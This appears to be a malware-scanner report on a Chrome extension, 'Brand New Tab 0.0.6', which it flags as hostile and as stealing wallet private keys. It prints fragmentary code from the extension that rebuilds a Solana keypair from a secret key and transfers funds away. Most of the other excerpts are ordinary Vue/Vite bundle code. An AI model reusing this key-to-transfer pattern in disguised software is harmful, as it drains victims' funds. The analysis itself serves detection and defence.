Hostile 100% chrome 14 installs Download

Brand New Tab 0.0.6

Exfiltrates wallet private keys

“Brand New Tab 是一款功能强大的Google Chrome插件,旨在通过提供多种实用工具和可定制的界面来提升您的浏览体验。这款开源插件非常适合开发人员、高级用户以及任何希望提高上网效率的人。”

Solana SOL fund transfer from stolen keyDense repeated Math.pow arithmetic

Evidence

Solana SystemProgram.transfer instruction index.06a41a17.js · lines 71–80
71:62…
72 const connection = new Connection(solStore.rpcUrl);
73 const closeAccountTransaction = new Transaction().add(
74 SystemProgram.transfer({
75 fromPubkey: accountToClose.publicKey,
76 toPubkey: payer.publicKey,
⋯4 lines
Solana keypair from secret key index.06a41a17.js · lines 101–112
101:19… dConfirmTransaction(connection, closeInstruction, [payer]);
102 };
103 const close = async () => {
104 const accountToClose = Keypair.fromSecretKey(bs58.decode(secrectKey.value));
105 const payer = solStore.currentAccount;
106 loading.value = true;
⋯6 lines
Creates a link resource element index.66529199.js · lines 4–13
4:4… _defNormalProp(obj, typeof key !== "symbol" ? key + "" : key, value);
5 return value;
6};
7const scriptRel = function detectScriptRel() {
8 const relList = document.createElement("link").relList;
9 return relList && relList.supports && relList.supports("modulepreload") ? "modulepreload" : "preload";
10}();
11const seen = {};
12const base$2 = "";
13const __vitePreload = f …
Vue shared bundle version banner index.66529199.js · lines 30–50
30:23… t";
31 link.crossOrigin = "";
32 }
33 link.href = dep;
34 document.head.appendChild(link);
35 if (isCss) {
36 return new Promise((res, rej) => {
⋯6 lines
43const global$1 = globalThis || void 0 || self;
44/**
45* @vue/shared v3.4.25
46* (c) 2018-present Yuxi (Evan) You and Vue contributors
47* @license MIT
48**/
49/*! #__NO_SIDE_EFFECTS__ */
50function makeMap(str, expectsLo …
JavaScript iterates enumerable object keys index.66529199.js · lines 143–151
143:60… e(item) : normalizeStyle(item);
144 if (normalized) {
145 for (const key in normalized) {
146 res[key] = normalized[key];
147 }
⋯4 lines

Showing the top 5 files — 16 more files (371 regions) not shown.

No evidence locations were recorded for this file. Raw result

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.